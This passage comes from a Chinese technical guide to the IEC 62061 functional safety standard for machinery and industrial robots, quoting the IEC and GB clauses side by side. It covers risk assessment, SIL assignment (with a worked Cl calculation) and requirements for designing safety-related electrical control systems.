——第5章至第9章规定的活动; ——验证活动; ——确认活动。 2.3.1 条款目的与意图 标准条款4.2.2引出了功能安全计划实施的内容。 2.3.2 条款解释 标准条款4.2.2主要讲了两件事情。一是要“确保立即跟踪”,即在功能安全计划实施的过程中,要有清晰、真实的记录,并有专人对这些记录进行跟踪和归档。二是要“完满地解决问题”,这些问题是在功能安全计划实施过程中暴露出来的机械/工业机器人本身的问题。在这里,我们尤其要关注软件方面的问题。软件是机械/工业机器人的大脑,软件出现问题,机器人的功能安全肯定是得不到保障的。因此,在实施功能安全计划的过程中,应对机械/工业机器人控制系统软件给予足够的重视。 SRECS相关问题主要来自以下方面:一是实施标准第5章至第9章规定的活动时暴露的问题;二是验证活动中暴露的问题;三是确认活动中暴露的问题。问题的来源既可能是机械/工业机器人控制系统软件中隐藏的缺陷,也可能是设计、整合、测试、验证、确认过程中由于考虑不周、操作不当等引入的管理问题。以上问题,对机械/工业机器人的功能安全具有不同的影响,但是从管理角度看,所有问题都要如实记录,并得到合适的闭环。 第3章 安全风险评估 3.1 概述 安全风险评估是设计安全相关控制系统的根本依据。评估的主要内容包括:使用设备的安全风险点,降低风险需要的安全相关控制功能,风险降低措施及安全相关控制功能的SIL。在标准IEC 62061中,机械设计和风险评估采用ISO 12100《机械安全 设计通用原则:风险评估和风险降低》及ISO 14121《机械安全 风险评估》中规定的方法。 ISO12100标准中规定了机械设计过程中用于实现机械安全的基本术语、原则和方法,以及风险评估与风险降低的原则,帮助设计者实现机械安全的目标。这些原则基于机械相关设计、使用、事件、事故和风险的知识和经验。标准还规定了在机械生命周期的相应阶段内识别危险、估计和评价风险的程序,消除危险或充分降低风险的程序,以及记录和验证风险评估与风险减少程序的指南。 ISO14121是机械安全标准中的重要方法性标准,它规定了降低风险的一般原则,并统称为风险评估。风险评估考虑了机械相关设计、生产、运输、安装、使用和拆卸等产品生命周期内的各个阶段,提供了进行风险评估所需要的信息,规定了用于识别危险、评估风险和评定风险的程序。该标准对确定机械产品安全和证明产品进行过风险评估所要求的证书类型提供指导。 标准IEC 62061的附录A中,也给出了风险评估和SIL分配的定性方法示例,适用于机器的SRCF。因此,本章将结合标准ISO12100、ISO14121,对标准IEC 62061的附录A进行解读,并详细阐述符合标准要求的安全相关控制系统的风险评估方法。 3.2 风险评估 风险评估是以系统方法对机械相关风险进行分析和评定的一系列逻辑步骤。需要时,风险评估之后采用ISO12100中所描述的方法降低风险。当采取保护措施尽可能消除危险和充分降低风险时,重复进行风险评估是必要的。 3.2.1 SIL分配概述 【IEC标准条款】 Annex A SIL assignment A.1 General This informative Annex provides one example of a qualitative approach for risk estimation and SIL assignment that can be applied to SRCFs for machines.Examples of other techniques that may be used for SIL assignment are given in IEC 61508-5 and will be outlined in a proposed future IEC TC44 Technical Specification. NOTE1 The methodology described in this Annex uses qualitative estimation of risk and is intended to be generally applied for the assignment of a SIL(s) to SRCF(s) of machines.The risk parameters used whilst applying this methodology to particular machines and their specific hazards should be subject to agreement with those involved to ensure that the SRECS can provide adequate risk reduction. NOTE2 In a large number of machine specific standards ("C"type standards in CEN) risk estimation has been carried out to select a required Category in accordance with ISO13849-1:1999 for safety-related parts of machine control systems.It is noted that,for simplification,the following relationships are commonly used:required Category1 to required SIL1,required Category2 to required SIL1,required Category3 to required SIL2 and required Category4 to required SIL3.More comprehensive methods of mapping between required Categories of ISO13849-1:1999 and required SILs used in this international standard are under consideration. For each specific hazard,the safety integrity requirements should be determined separately for the safety-related control function(s) to be performed by the SRECS (see 5.2.4.2). Figure A.1 is an example of a practical way of carrying out a risk assessment at a specific hazard leading to estimation of a SIL requirement for a SRECS function.This methodology should be performed for each risk that is to be reduced by a safety-related control function that is to be implemented by a SRECS.Figure A.1 should be used in conjunction with the guidance information in this Annex. Risk estimation is an iterative process,this means that the process will need to be carried out more than once. Figure A.1 shows a feedback arrow to risk estimation.This is required because the provision of a particular protective measure to implement an SRCF may have an affect on the risk parameters (e.g.the use of a protective light curtain may result in a greater frequency of access).A failure of the light curtain will then expose the operator to a greater risk than originally envisaged.This requires that the process should be repeated following the same method but using the amended risk parameter(s). At the end of the process shown in Figure A.1,the SIL estimated is the SIL requirement for the safety-related control function.Figure A.1-Workflow of SIL assignment process 【GB标准条款】 附录A SIL分配 A.1 概述 本附录提供了风险评估和SIL分配的定性方法的示例,适用于机器的SRCF。在GB/T20438.5中有用于SIL分配的其他技术的例子,并且将会在即将提出的IEC TC44技术规范中略述。 注1:本附录所描述的方法论使用风险的定性评估,通常适用于对机器的SRCF的SIL分配。对特定的机器应用这种方法时所使用的风险参数和其具体的危险应与相关人员协议,以确保SRECS能够将风险降至足够低。 注2:大量的机器特定标准(CEN中的“C”类标准)中执行了风险评估,按照GB/T 16855.1中机器控制系统有关安全部件选择要求的类别,为了简化,要注意下列常用的关系:要求的类别1——要求的SIL1;要求的类别2——要求的SIL1;要求的类别3——要求的SIL2;要求的类别4——要求的SIL3。GB/T 16855.1所要求的类别和本标准所要求的SIL之间更多映射的综合方法在考虑中。 对于每一个特定危险,其安全完整性要求由SRECS执行的安全相关控制功能分别决定(见5.2.4.2)。 图A.1是一个在特定危险处进行风险评估的实用方法示例,该方法可用于评估SRECS功能的SIL要求。对于每个风险应执行这种评估方法,这些风险会通过SRECS执行的安全相关控制功能而降低。图A.1应与本附录的指导信息结合使用。 图A.1 SIL分配过程的工作流程 风险评估是一个迭代过程,这是指该过程需要不止一次地执行。 图A.1显示了风险评估的反馈箭头,这是必要的,因为提供特殊保护措施来执行SRCF可能对风险参数有影响(例如,使用保护光幕可能会导致更大的访问频率)。光幕失效将操作者暴露到比最初设想的更大的风险中。这要求遵循相同的方法重复该过程,但使用的是修改过的风险参数。 在如图A.1所示的过程结束时,经过评估的SIL就是安全相关控制功能要求的SIL。 安全完整性(Safety Integrity)是指在所有规定情况下,安全控制系统或其子系统圆满执行所要求的安全相关控制功能的概率,由硬件安全完整性和软件安全完整性组成。安全完整性等级越高,其未能执行所要求的安全相关控制功能的概率就越低。 安全完整性等级(Safety Integrity Level,SIL),是一种离散的等级,用于规定分配给SRECS的安全相关控制功能的安全完整性要求。在这里,安全完整性等级3(SIL3)是最高的,安全完整性等级1(SIL1)是最低的。IEC 62061标准不考虑SIL4,因为一般情况下SIL4不适合用于对机械相关风险的评估。IEC 62061标准提供了一种SIL分配方法,该方法能对安全风险进行评估并给出量化的SIL值。 3.2.2 风险评估和SIL分配 如果风险评估判定控制器失灵,或者保护装置的故障可能带来超过容许程度的严重风险,则必须将该风险的概率降低至剩余风险可以被接受的程度,也就是说该控制系统必须达到“安全等级”。 IEC 62061附录A中提供了一个计算公式,采用一种对风险进行分级的方法,进行概率、量化分析,形成相关安全功能的安全完整性等级(SIL)。 1. 危险识别/指示 【IEC标准条款】 A.2 Risk estimation and SIL assignment A.2.1 Hazard identification/indication Indicate the hazards,including those from reasonable foreseeable misuse,whose risks are to be reduced by implementing an SRCF.List them in the hazard column in Table A.5. 【GB标准条款】 A.2 风险评估和SIL分配 A.2.1 危险识别/指示 指示危险,包括可预见的误用所引起的危险,通过执行SRCF降低风险。将它们在表A.5的“危险”列(栏)中列出。 1)危险因素 安全工作的核心是危险的识别。危险源是指可能导致伤害或疾病、财产损失、工作环境破坏或这些情况的组合发生的根源或状态。它的特性包括以下方面。 ·客观现实性:存在于客观现实中,不以人的主观认识为转移。 ·潜在性:不易被意识到或发觉到;虽明显暴露,但没有转变为现实的危害。 ·复杂多变性:受制于作业情况,并随作业情况的变化而变化。 ·可知可防性:危险源可以辨别并能采取一定的手段去预防。 危险的分类有多种维度。例如,GB/T 6441—1986《企业职工伤亡事故分类》中,综合考虑起因物、引起事故先发的诱导性原因、致害物、伤害方式等后,将危险因素分为20类。 2)危险识别 危险识别应遵循科学性、系统性、全面性和预测性原则,危险识别的方法可分为对照法和安全分析法两类。 对照法是一种基于经验的方法,即与相关技术安全规范、标准、操作规程及以往类似工作经验进行对照从而识别危险源的方法,具体包括询问交谈法、检查表法、现场观察法、查阅外部信息法、查阅相关记录法等。对照法的优点是操作简单、易行;缺点是重点不突出且容易遗漏,尤其是无先例的新活动应用该方法较为困难。 IEC 62061标准选择的是另外一种识别方法——安全分析法。安全分析法是通过揭示导致故障或事故的各种因素及相互关联来辨识系统中的危险源的方法,具体包括危险与可操作性(HAZOP)研究、工作任务分析、事件树分析(ETA)、故障树分析(FTA)等。安全分析法的优点是系统、全面;缺点是对人员素质的要求高。 2. 风险评估 【IEC标准条款】 A.2.2 Risk estimation Risk estimation should be carried out for each hazard by determining the risk parameters thatas shown in Figure A.2 should be derived from the following: -severity of harm,Se;and -probability of occurrence of that harm,which is a function of: ·frequency and duration of the exposure of persons to the hazard,Fr; ·probability of occurrence of a hazardous event,Pr;and ·probability to avoid or limit the harm,Av.Figure A.2-Parameters used in risk estimation The estimates entered into Table A.5 should normally be based on worst-case considerations for the SRCF.However,in a situation where,for example,an irreversible injury is possible but at a significantly lower probability than a reversible one,then each severity level should have a separate line on the table.It may be the case that a different SRCF is implemented for each line.If one SRCF is implemented to cover both lines,then the highest target SIL requirement should be used. 【GB标准条款】 A.2.2 风险评估 应通过确定风险参数对每个危险进行风险评估。如图A.2 所示,风险参数来源于下列要素: ——伤害严重程度,Se; ——伤害发生概率,它是下列因素的函数: ·人暴露在危险中的频率和持续时间,Fr; ·危险事件发生概率,Pr; ·避免或者限制伤害发生的概率,Av。 图A.2 用于风险评估的参数 进行表A.5的评估通常是以对SRCF最坏情况的考虑为基础的。然而,在一种情况下,如有一个不能挽回的伤害可能发生,但是比可以挽回的伤害的发生概率要低得多,那么每一个严重程度等级应在表格中占单独一行。可能每一行都执行不同的SRCF。如果两行执行同一个SRCF,那么应使用最高目标SIL要求。 风险评估可通过以下4种风险因素进行判定,包括: (1)伤害严重程度(Se); (2)暴露的频率和持续时间(Fr); (3)危险事件发生概率(Pr); (4)避免或限制伤害发生的概率(Av)。 这些风险因素构成了实现安全相关控制功能的输入参数,采用这些输入参数,可以将风险分摊给安全相关控制功能。 3. 伤害严重程度 【IEC标准条款】 A.2.3 Severity (Se) Severity of injuries or damage to health can be estimated by taking into account reversible injuries,irreversible injuries and death.Choose the appropriate value of severity from Table A.1 based on the consequences of an injury,where: 4 means a fatal or a significant irreversible injury such that it will be very difficult to continue the same work after healing,if at all; 3 means a major or irreversible injury in such a way that it can be possible to continue the same work after healing.It can also include a severe major but reversible injury such as broken limbs; 2 means a reversible injury,including severe lacerations,stabbing,and severe bruises that requires attention from a medical practitioner; 1 means a minor injury including scratches and minor bruises that require attention by first aid. Select the appropriate row for consequences (Se) of Table A.1.Insert the appropriate number under the Se column in Table A.5. Table A.1-Severity (Se) classification 【GB标准条款】 A.2.3 严重程度(Se) 伤害或者损坏健康的严重程度能够通过可以挽回的伤害、不可挽回的伤害和死亡来进行评估。根据伤害的后果从表A.1中选择严重程度的适当值,其中: 4 代表致命的或者严重且不能挽回的伤害,在康复后难以进行相同的工作,即使有也极少; 3 代表严重或者不能挽回的伤害,但在康复后存在可以继续从事相同工作的可能性,同时它还包括重大的但可以挽回的伤害,比如断肢; 2 代表可以挽回但需要专业医疗护理的伤害,包括严重的破口、刺伤及严重的撞伤; 1 代表需要急救护理的较小伤害,包括擦伤和较轻的撞伤。 根据伤害的后果在表A.1中选择适当的行。在表A.5的“Se”列中填入适当的数字。 表A.1 严重程度(Se)等级 标准条款A.2.3 定义了伤害的严重程度量化值,使用时可通过评估确定量化值。具体的例子详见第8章。 4. 伤害发生概率 【IEC标准条款】 A.2.4 Probability of occurrence of harm Each of the three parameters of probability of occurrence of harm (i.e.Fr,Pr and Av) should be estimated independently of each other.A worst-case assumption needs to be used for each parameter to ensure that SRCF(s) are not incorrectly assigned a lower SIL than is necessary.Generally,the use of a form of task-based analysis is strongly recommended to ensure that proper consideration is given to estimation of the probability of occurrence of harm. A.2.4.1 Frequency and duration of exposure Consider the following aspects to determine the level of exposure: ·need for access to the danger zone based on all modes of use,for example normal operation,maintenance;and ·nature of access,for example manual feed of material,setting. It should then be possible to estimate the average interval between exposures and therefore the average frequency of access. It should also be possible to foresee the duration,for example if it will be longer than10 min.Where the duration is shorter than10 min,the value may be decreased to the number in the row below in Table A.2.This does not apply to frequency of exposure≤1h,which should not be decreased at any time. NOTE The duration is related to the performance of activities that are carried out under theprotection of the SRCF.The requirements of IEC 60204-1 and ISO14118 with regard to power isolation and energy dissipation should be applied for major interventions. This factor does not include consideration of the failure of the SRCF. Select the appropriate row for frequency and duration of exposure (Fr) of Table A.2.Insert the appropriate number under the Fr column in Table A.5. Table A.2-Frequency and duration of exposure (Fr) classification A.2.4.2 Probability of occurrence of a hazardous event The probability of occurrence of harm should be estimated independently of other related parameters Fr and Av.A worst-case assumption should be used for each parameter to ensure that SRCF(s) are not incorrectly assigned a lower SIL than is necessary.To prevent this occurring the use of a form of task-based analysis is strongly recommended to ensure that proper consideration is given to estimation of the probability of occurrence of harm. This parameter can be estimated by taking into account: a) Predictability of the behaviour of component parts of the machine relevant to the hazard in different modes of use (e.g.normal operation,maintenance,fault finding). This will necessitate careful consideration of the control system especially with regard to the risk of unexpected start up.Do not take into account the protective effect of any SRECS.This is necessary in order to estimate the amount of risk that will be exposed if the SRECS fails.In general terms,it must be considered whether the machine or material being processed has the propensity to act in an unexpected manner. The machine behaviour will vary from very predictable to not predictable but unexpected events cannot be discounted. NOTE1 Predictability is often linked to the complexity of the machine function. b) The specified or foreseeable characteristics of human behaviour with regard to interaction with the component parts of the machine relevant to the hazard.This can be characterised by: -stress (e.g.due to time constraints,work task,perceived damage limitation);and/or -lack of awareness of information relevant to the hazard.This will be influenced by factors such as skills,training,experience,and complexity of machine/process. These attributes are not usually directly under the influence of the SRECS designer,but atask analysis will reveal activities where total awareness of all issues,including unexpected outcomes,cannot be reasonably assumed. "Very high" probability of occurrence of a hazardous event should be selected to reflect normal production constraints and worst case considerations.Positive reasons (e.g.well-defined application and knowledge of high level of user competences) are required for any lower values to be used. NOTE2 Any required or assumed skills,knowledge,etc.should be stated in the information for use. Select the appropriate row for probability of occurrence of hazardous event (Pr) of Table A.3.Indicate the appropriate number under the Pr column in Table A.5. Table A.3-Probability of occurrence of hazardous event (Pr) classification A.2.4.3 Probability of avoiding or limiting harm (Av) This parameter can be estimated by taking into account aspects of the machine design and its intended application that can help to avoid or limit the harm from a hazard.These aspects include,for example -sudden,fast or slow speed of appearance of the hazardous event; -spatial possibility to withdraw from the hazard; -the nature of the component or system,for example a knife is usually sharp,a pipe in a dairy environment is usually hot,electricity is usually dangerous by its nature but is not visible;and -possibility of recognition of a hazard,for example electrical hazard:a copper bar does not change its aspect whether it is under voltage or not;to recognize if one needs an instrument to establish whether electrical equipment is energised or not;ambient conditions,for example high noise levels can prevent a person hearing a machine start. Select the appropriate row for probability of avoidance or limiting harm (Av) of Table A.4.Insert the appropriate number under the Av column in Table A.5. Table A.4-Probability of avoiding or limiting harm (Av) classification 【GB标准条款】 A.2.4 伤害发生概率 伤害发生概率的3个参数(即Fr、Pr和Av)应互相独立地进行评估。每个参数需使用最坏情况的设想,从而确保SRCF没有被错误指定比必需的等级低的SIL。通常,强烈建议使用基于任务分析的形式,以确保伤害发生概率的评估被给予适当的考虑。 A.2.4.1 暴露频率和持续时间 确定暴露的等级考虑下述方面: ——在所有使用方式的基础上,需要进入危险区,如正常运行、维护; ——进入的性质,如手工送料、设置。 那么应能评估暴露的平均时间间隔,从而评估进入的平均频率。 同样,可以预见暴露在危险中的持续时间,如长于10min。 当持续时间短于10min时,数值可能会减少到下一个等级。这并不适用于暴露频率不大于1小时1次的情况,当暴露频率大于1小时1次时,任何时候等级都不会减少。 注:持续时间与在SRCF的保护下执行的活动的性能相关。GB 5226.1和ISO14118有关动力隔离和功率耗散的要求应适用于主要干预。 这个因素不包括SRCF的失效考虑。 根据暴露频率和持续时间在表A.2中选择适当的行。在表A.5的“Fr”列中填入适当的数字。 表A.2 暴露频率和持续时间(Fr)等级 A.2.4.2 危险事件发生概率 伤害发生概率应独立于其他相关参数Fr和Av进行评估。每个参数应作最坏情况的设想,以确保SRCF没有被错误指定比所需等级低的SIL。为防止以上事件的发生,强烈建议使用基于任务分析的形式,以确保伤害发生概率的评估被给予适当考虑。 参数评估应考虑下述因素: a)在不同的使用方式(例如正常操作、维护、故障发现)下,与危险有关的机器零部件行为的可预见性。 有必要仔细考虑控制系统,特别是与意外启动风险相关的控制系统。但是不要考虑任何SRECS的保护效应。这对于评估SRECS失效时暴露的风险量是必要的。概括来说,必须考虑机器或进行加工的材料是否有以外方式运作的倾向。 机器的行为将变化,从完全可以预见到无法预见,但是不能忽视意外事件。 注1:可预见性经常与机器功能的复杂性相关。 b)规定或可预见的与危险相关机器零部件相互作用的人类行为,以下列内容为特征: ——工作压力(例如由时间限制、工作任务、可感知的损伤限制带来的压力); ——缺乏危险相关认识。这会受一些因素的影响。例如,技能、培训、经验、机器/加工的复杂性。 这些属性通常并不直接受SRECS设计者的影响,但是任务分析将暴露那些不能完全预见的所有可能方面(包括不可预见的结果)的活动。 危险事件发生概率应选择“非常高”,以反映正常生产限制和最坏情况。对于使用任何较低值,合理的原因(例如,良好定义的应用程序和对高水平用户能力的了解)是必要的。 注2:任何所需的或假定的技能、知识等都应在使用信息中陈述。 根据危险事件发生概率(Pr)在表A.3中选择适当的行。在表A.5的Pr列中填入适当的数字。 表A.3 危险事件发生概率(Pr)等级 A.2.4.3 避免或限制伤害发生的概率(Av) 这个参数可以通过考虑机器设计及其预期应用等方面来评估:预期应用有助于避免或限制来自危险的伤害。这些方面包括: ——危险事件的发生是突然的、快速的,或者是缓慢的; ——撤离危险空间的可能性; ——元件或系统的性质,如刀通常是锋利的,日常环境里的管道通常是热的,电虽然看不见,但其性质通常是危险的; ——识别危险的可能性。例如,电气危险:铜棒不因其是否带电压而改变它的外观;人们需要用仪器来确定电气设备是否通电;环境条件,如高噪声级可能妨碍人们听到机器的启动。 根据避免或限制伤害发生的概率(Av),从表A.4中选择适当的行。在表A.5的Av列中填入适当的数字。 表A.4 避免或限制伤害发生的概率(Av)等级 条款A.2.4定义了用于评估人员在危险区域活动的暴露频率和持续时间、危险事件发生概率、避免或限制伤害发生的概率等变量的量化值。具体的例子详见第8章。 5. 伤害概率级别(Cl) 【IEC标准条款】 A.2.5 Class of probability of harm (Cl) For each hazard,and as applicable,for each severity level add up the points from the Fr,Pr and Av columns and enter the sum into the column Cl in Table A.5. Table A.5-Parameters used to determine class of probability of harm (Cl) 【GB标准条款】 A.2.5 伤害概率级别(Cl) 对于每一种危险,在适用的情况下,对于每一个伤害严重程度,将Fr、Pr和Av列的数据相加,然后在表A.5的列中输入总和。 表A.5 用于决定伤害概率级别的参数(CI) 条款A.2.5介绍了叠加Fr、Pr和Av列数据的Cl计算方法。 6. SIL分配 【IEC标准条款】 A.2.6 SIL assignment Using Table A.6,where the severity (Se) row crosses the relevant column (Cl),the intersection point indicates whether action is required.The black area indicates the SIL assigned as the target for the SRCF.The lighter shaded areas should be used as a recommendation that other measures (OM) be used. Table A.6-SIL assignment metrix EXAMPLE:For a specific hazard with an Se assigned as3,an Fr as4,an Pr as 5 and an Av as 5 then: Cl=Fr+Pr+Av=4+5+5=14 Using Table A.6,this would lead to a SIL3 being assigned to the SRCF that is intended to mitigate against the specific hazard. Figure A.3 shows an example of documentation that may be used to record the results of a SIL assignment exercise using this informative Annex.Figure A.3-Example proforma for SIL assignment process 【GB标准条款】 A.2.6 SIL分配 用表A.6,其中表示严重程度(Se)的行与有关的列(Cl)相交,交叉点即表示是否需要采取措施。黑色区域表示SIL被指定为SRCF目标,浅阴影区域表示应使用其他措施的建议。 表A.6 SIL分配矩阵 例如,如果一个特定的危险的Se为3、Fr为4、Pr为5、Av为5,则: Cl=Fr+Pr+Av=4+5+5=14 根据表A.6,将会分配SIL3给SRCF,从而减轻特定的危险。 图A.3显示使用本附录记录SIL分配练习结果的文件示例。 图A.3 SIL分配过程形式示例 条款A.2.6确定了影响因素Se、Fr、Pr和Av,可按照标准中表A.5、表A.6评估出的风险大小确定所需的SIL。SRCF的SIL与可能的伤害严重程度和伤害概率级别Cl(Cl=Fr+Pr+Av)相对应。具体实例见第8章。 3.3 适用性 安全风险评估是在危险事件发生之前或者之后(但还没有结束)进行,对该危险事件给人们生活、生命、财产等各个方面造成的影响和损失的可能性进行量化评估的工作。概括地说,安全风险评估就是量化评估某一事件或事物带来的影响或损失的可能程度。IEC 62061标准附录A中提供的安全风险评估方法和安全完整性等级(SIL)分配的应用模板,适用于机械/工业机器人安全相关控制功能(SRCF)的风险评估和SIL分配。而在IEC 61508-5标准中,也给出了可用于SIL分配的其他技术的例子,如果各位感兴趣则可以查阅。 第4章 安全相关电气控制系统的设计与整合 4.1 目的 【IEC标准条款】 6.1 Objective This Clause specifies requirements for the selection or design of a SRECS to meet the functional and safety integrity requirements specified in the safety requirements specification (see 5.2). 【GB标准条款】 6.1 目的 本条款规定SRECS设计或选择要求,以满足安全要求规范中规定的功能和安全完整性要求(见5.2)。 本标准条款规定了SRECS(安全相关电气控制系统)的设计或选择要满足安全要求规范中规定的SRCF的功能要求和安全完整性要求。 SRCF主要是指由SRECS按照指定的综合等级来保持机器的安全状态或防止危险发生的控制功能。也就是说,设计的SRECS应按照我们预期想要达到的安全等级,对存在的风险进行防护,或者在机器出现危险状况时,能保证机器仍然处于安全状态,所有这些控制相关的功能都是安全相关的控制功能。当系统部件的SRCF一一列出时,它就变成了需求规范,从而更好地指导系统研发过程。 SRCF的安全完整性等级(SIL)要求来自风险评估。通常,在风险评估初期的时候,是没有办法对SRCF的安全完整性等级进行定量衡量的,只是将考虑到的每个具体的风险找出来,并根据一些参数来确定风险级别的高低。对于风险级别高的,就用安全完整性等级高的SRECS来防护;对于风险级别低的,就用安全完整性等级低的SRECS来防护。然后根据每个SIL的具体要求,进行SRECS设计。完成设计之后,再根据具体的元器件相关参数、计算方法等来计算出SIL对应的PFH(每小时危险失效概率),以验证设计是否满足当初风险设计得出的SIL等级。如果不满足,则需要重新进行设计并计算PFH,直到满足要求,从而最终实现系统设备的运行安全。 4.2 安全相关电气控制系统选择或设计 【IEC标准条款】 6.2 General requirements 6.2.1 The SRECS shall be selected or designed to meet the safety requirements specification (see 5.2) and where relevant the software safety requirements specification (see 6.10) taking into account the appropriate requirements of this standard. 6.2.2 The selection or design of the SRECS (including the overall hardware and software architecture,sensors,actuators,programmable electronics,embedded software,application software,etc.) shall comply with either 6.5 or 6.6.Whichever method is used,the SRECS shall meet the following requirements: a) the requirements for hardware safety integrity comprising: -the architectural constraints on hardware safety integrity (see 6.6.3.3);and -the requirements for the probability of dangerous random hardware failures (see 6.6.3.2); b) the requirements for systematic safety integrity (see 6.4) comprising; -the requirements for the avoidance of failures,and -the requirements for the control of systematic faults; c) the requirements for SRECS behaviour on detection of a fault (see 6.3); d) the requirements for the design and development of safety-related software (see 6.10 and 6.11). 6.2.3 The design of the SRECS shall take into account human capabilities and limitations (including reasonably foreseeable misuse) and be suitable for the actions assigned to operators,maintenance staff and others who might interact with the SRECS.The design of all operator interfaces shall follow good human-factor practice (see the IEC 61310 series) and shall accommodate the likely level of training or awareness of operators,in particular,for mass-produced subsystems where the operator can be a member of the public. NOTE The design goal should be that reasonably foreseeable mistakes made by operators or maintenance staff are prevented or eliminated by design.Where this is not possible,other means should also be applied (e.g.manual action with secondary confirmation before completion) to minimize the possibility of operator errors and ensure that foreseeable mistakes do not lead to increased risk. 6.2.4 Maintainability and testability shall be considered during the design and integration to facilitate the implementation of these properties in the SRECS. 6.2.5 The SRECS design,including its diagnostic and fault reaction functions,shall be documented.This documentation shall: -be accurate,complete and concise; -be suitable for its intended purpose; -be accessible and maintainable; -be version controlled. 6.2.6 The outcome of the activities performed during SRECS design,development and implementation shall be verified at appropriate stages. 6.3 Requirements for behaviour (of the SRECS) on detection of a fault in the SRECS 6.3.1 The detection of a dangerous fault in any subsystem that has a hardware fault tolerance of more than zero shall result in the performance of the specified fault reaction function. The specification may allow isolation of the faulty part of the subsystem to continue safe operation of the machine while the faulty part is repaired.In this case,if the faulty part is not repaired within the estimated maximum time as assumed in the calculation of the probability of random hardware failure (see 6.7.8),then a second fault reaction shall be performed to maintain a safe condition. Where the SRECS is designed for online repair,isolation of a faulty part shall only be applicable where this does not increase the probability of dangerous random hardware failure of the SRECS above that specified in the SRS. After the occurrence of faults that reduce the hardware fault tolerance to zero,the requirements of 6.3.2 apply. NOTE The mean time to restoration (see IEV191-13-08) that is considered in the reliability model will need to take into account the diagnostic test interval,the repair time and any other delays prior to restoration. 6.3.2 Where a diagnostic function(s) is necessary to achieve the required probability of dangerous random hardware failure and the subsystem has a hardware fault tolerance of zero,then the fault detection and specified fault reaction shall be performed before the hazardous situation addressed by the SRCF can occur. EXCEPTION to 6.3.2:In the case of a subsystem implementing a particular SRCF where the hardware fault tolerance is zero and the ratio of the diagnostic test rate to the demand rate exceeds100,then the diagnostic test interval of that subsystem shall be such as to enable the subsystem to meet the requirement for the probability of dangerous random hardware failure. 6.3.3 Where performance of a fault reaction function as part of a SRCF that is specified as SIL3 has resulted in the machine being stopped,subsequent normal operation of the machine via the SRECS (e.g.enabling re-start of the machine) shall not be possible until the fault has been repaired or rectified.For SRCFs with a specified safety integrity of less than SIL3,the behaviour of the machine after performance of a fault reaction function (e.g.restarting normal operation) shall depend on the specification of relevant fault reaction functions (see 5.2.3). 6.4 Requirements for systematic safety integrity of the SRECS 6.4.1 Requirements for the avoidance of systematic hardware failures 6.4.1.1 The following measures shall be applied: a) the SRECS shall be designed and implemented in accordance with the functional safety plan (see4.2); b) proper selection,combination,arrangements,assembly and installation of subsystems,including cabling,wiring and any interconnections; c) use of the SRECS within the manufacturer's specification; d) use of manufacturer's application notes,for example catalogue sheets,installation instructions,and use of good engineering practice (see also ISO13849-2,Clause D.1); e) use of subsystems that have compatible operating characteristics (see also ISO13849-2,Clause D.1); f) the SRECS shall be protected in accordance with IEC 60204-1; g) prevention of the loss of functional earth connection(s) in accordance with IEC 60204-1; h) undocumented modes of component operation shall not be used (e.g.'reserved'registers of programmable equipment);and i) consideration of foreseeable misuse,environmental changes or modification(s). 6.4.1.2 In addition,at least one of the following techniques and/or measures shall be applied taking into account the complexity of the SRECS and the SIL(s) for those functions to be implemented by the SRECS: a) SRECS hardware design review (e.g.by inspection or walk-through):to establish by reviews and/or analysis any discrepancies between the specification and implementation; b) advisory tools such as computer-aided design packages capable of simulation or analysis,and/or the use of computer-aided design tools to perform the design procedures systematically with the use of pre-designed elements that are already available and tested; c) simulation:perform a systematic and complete assimilation of a SRECS design in terms of both functional performance and the correct dimensioning and interaction of its subsystems. 6.4.2 Requirements for the control of systematic faults The following measures shall be applied: a) use of de-energization:the SRECS shall be designed so that with loss of its electrical supply a safe state of the machine is achieved or maintained; b) measures to control the effect of temporary subsystem failures:the SRECS shall be designed so that,for example: -voltage variation (e.g.interruptions,dips) to an individual subsystem or a part of a subsystem does not lead to a hazard (e.g.a voltage interruption that affects a motor circuit shall not cause an unexpected start-up when the supply is restored),and -the effects of electromagnetic interference from the physical environment or a subsystem(s) do not lead to a hazard; c) measures to control the effects of errors and other effects arising from any data communication process,including transmission errors,repetitions,deletion,insertion,resequencing,corruption,delay and masquerade; d) when a dangerous fault occurs at an interface,the fault reaction function shall be performed before the hazard due to this fault can occur.When a fault that reduces the hardware fault tolerance to zero occurs,this fault reaction shall take place before the estimated MTTR (see 6.7.4.4.2 g) is exceeded. The requirements of item d) apply to interfaces that are inputs and outputs of subsystems and all other parts of subsystems that include or require cabling during integration (for example output signal switching devices of a light curtain,output of a guard position sensor). 【GB标准条款】 6.2 一般要求 6.2.1 SRECS的选择或设计应符合安全要求规范(见5.2)和有关软件安全要求规范(见6.10),并考虑本标准的适当要求。 6.2.2 SRECS的选择或设计(包括总体硬件、软件体系结构、传感器、执行元件、可编程电子器件、嵌入式软件、应用软件等)应符合6.5或6.6的要求。不管使用哪种方法,SRECS均应符合下列要求。 a)硬件安全完整性要求,包括: ——硬件安全完整性体系结构限制(见6.6.3.3); ——危险随机硬件失效概率要求(见6.6.3.2)。 b)系统安全完整性要求(见6.4),包括: ——失效避免要求; ——系统故障控制要求。 c)对故障检测SRECS行为的要求(见6.3)。 d)安全相关软件设计和开发要求(见6.10和6.11)。 6.2.3 SRECS设计应考虑人的能力和局限(包括可合理预见的误操作),且分配给操作人员、维护人员和其他可能与SRECS交互的人员的工作合适。所有操作员界面的设计应遵循良好人为因素惯例(见GB/T18209 系列),并应提供等级合适的培训和操作员知识,尤其对大批量生产的子系统,其操作员可能是公众成员。 6.2.4 在进行设计和集成时,应该考虑可维护性和可测试性,以便执行SRECS的这些特性。 6.2.5 SRECS设计,包括诊断和故障反应功能,应形成文件。文件应: ——精确、完整、简明; ——适合预期目的; ——可存取、可维护; ——版本可以控制。 6.2.6 在SRECS设计、开发和执行期间,执行的工作结果应在适当阶段验证。 6.3 检测SRECS故障时的行为(SRECS的)要求 6.3.1 硬件容错率大于零的任何子系统的危险故障检测都可导致特定故障反应功能的运行。 在修理期间,规范允许隔离子系统的故障部分以便机器可以继续安全操作。在这种情况下,如果故障部分未在估计的最长时间,即假设以危险随机硬件失效概率(见6.7.8)计算的时间内修理,那么应执行第二故障反应,以保持安全状态。 当SRECS在最初设计为在线维修时,隔离故障部分只能在SRS规定的部分而不增加SRECS危险随机硬件失效概率的情形下使用。 在硬件已经没有容错能力的故障出现后,应采用6.3.2的规定。 6.3.2 需要故障诊断功能以得到所需要的危险随机硬件失效概率和子系统为零容错的场合,故障检测和规定的故障反应在SRCF处理的危险情况出现前执行。 